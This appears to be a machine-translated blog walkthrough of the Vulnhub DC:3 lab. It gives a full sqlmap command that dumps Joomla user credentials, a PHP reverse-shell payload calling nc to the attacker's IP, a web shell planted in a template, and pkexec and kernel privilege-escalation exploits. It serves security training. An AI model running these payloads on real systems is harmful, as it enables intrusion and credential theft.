当前位置:网站首页>Vulnhub | dc: 3 | [actual combat]
Vulnhub | dc: 3 | [actual combat]
2022-06-23 08:09:00 【sayo.】
Write it at the front
Range link :
https://www.vulnhub.com/entry/dc-32,312/
Some knowledge points are DC:1 I mentioned , You can flip through
DC:1
Note that the range only needs to acquire unique FLAG.( Right to be raised to root)
On , There is an error message from a connected device (VMware), Modify as follows , modify DC_3.vmx
Information gathering
scanning c paragraph , here 115 It's an attacker ,159 It's a target ,141 For physical machines ,61 Gateway 
Port scanning , find out 80 port 
Get into , See the web page 
Fingerprint identification is joomla CMS

MSF
Use msf Search for ready-made , Many detection modules and intrusion modules have been found here 
Continue to collect information , determine poc Range , lookup scanner There are several. , I've tried everything here 
Here is the violent enumeration login , But it didn't work 
gallerywd The scan did not reveal anything 
page enumeration , Only a few web pages have been found 
Plug in scanning , You can see that there are some sql Injection point 
Version scan , The version found is 3.7.0
With the above information , We can go further , More specifically poc,3.7 A large number of SQL Inject 
The second version number matches , View the poc, transfer sqlmap
Use this command , find out mysql edition , database 
Appoint joomladb database , Look up the table 
Obviously there is one #__users surface , Probably have sensitive information , Specify the table , Check out the column 
obviously , Here are sensitive column names , Use the following payloaddump Data
sqlmap -u "http://192.168.201.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T \#__users -C "username,password" --dump
Get the code hash value 
Use john Blast , Note that the ciphertext is first stored as a file , The burst password is snoopy
Log in with the user password , Note: log in to the background /administrator
Inject the Trojan horse into the template file 
Ant sword connection 
Pkexec Raise the right
Connect in , First of all to see suid file , Get ready suid Raise the right . In fact, there is not much discovery here ,suid The file is regular . But due to the recent pwnkit Huge loopholes , Almost for previous versions of pkexec It's a killing pass , First, we can measure pkexec Loophole 
poc Address
https://github.com/berdav/CVE-2021-4034
CVE-2021-4034 There is no explanation here , For use only , Using this vulnerability can directly obtain root jurisdiction
Upload files through ant sword , Very convenient

Compile and execute poc
The vulnerability is detected , Ready to use this lift . Because the virtual terminal of ant sword is not persistent , It is simulated by commands ,( Continuous interaction is required after the right is raised ) So here's a bounce shell come out .
Learn from other students payload, Apply to php, After saving, go to the home page to trigger
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.201.115 2333 >/tmp/f');
?>

The attacker bounces back after listening shell
Execution Vulnerability poc, Direct access to root jurisdiction 
obtain flag
ubuntu 16.04 Raise the right
Older methods , It is also most of the solutions to this problem , here , First, the information collection kernel , Version and other information , yes ubuntu 16.04
stay expdb To find out if this version of poc, It's found that there are , that centos 7 Very much in 
open poc, find exp Download address 
The download address is as follows
https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Upload this after downloading poc To the victim host 
decompression 
Run... After compilation
./compile.sh
./doubleput

Mention right to success , find flag file 
边栏推荐
- Socket programming -- select model
- Structure and usage of transform
- Ignore overlength parameter violation
- VTK. Le bouton gauche de la souris JS glisse pour changer le niveau et la largeur de la fenêtre
- 生产环境服务器环境搭建+项目发布流程
- QT reading XML files using qdomdocument
- INT 104_ LEC 06
- Odoo project sends information to wechat official account or enterprise wechat
- View the file once a second and send the result of the last line of the file to the syslog server
- The essence of five good books on wealth and freedom
猜你喜欢

Talk about routing design in service governance

What are open source software, free software, copyleft and CC? Can't you tell them clearly?

深度学习------不同方法实现lenet-5模型

After reading five books, I summarized these theories of wealth freedom

Structure and usage of transform

vtk. JS left mouse button sliding to change window level and window width

Commonly used bypass methods for SQL injection -ctf

Implementation of AVL tree

openni. utils. OpenNIError: (OniStatus.ONI_STATUS_ERROR, b‘DeviceOpen using default: no devices found‘

11 字符串函数
随机推荐
A record of "from scratch" in college student accounts
Image segmentation - improved network structure
5本财富自由好书的精华
Acwing第 56 場周賽【完結】
Acwing game 56 [End]
配置ASMX无法访问
Introduction to Excel VBA and practical examples
Production environment server environment setup + project release process
Apache Solr arbitrary file read replication
Tri rapide + Tri par bulle + Tri par insertion + Tri par sélection
Tensorboard的使用
vtk.js鼠標左鍵滑動改變窗比特和窗寬
Capturing packets to find repeated acks and a large number of TCP retransmissions in TCP sessions -- sack (selective acknowledgement) technology
C# richTextBox控制最大行数
Google common syntax
PHP serialization and deserialization CTF
Display proportion of sail soft accumulation diagram
【Try to Hack】ip地址
帆软堆积图显示占比
MFC Radio Button分组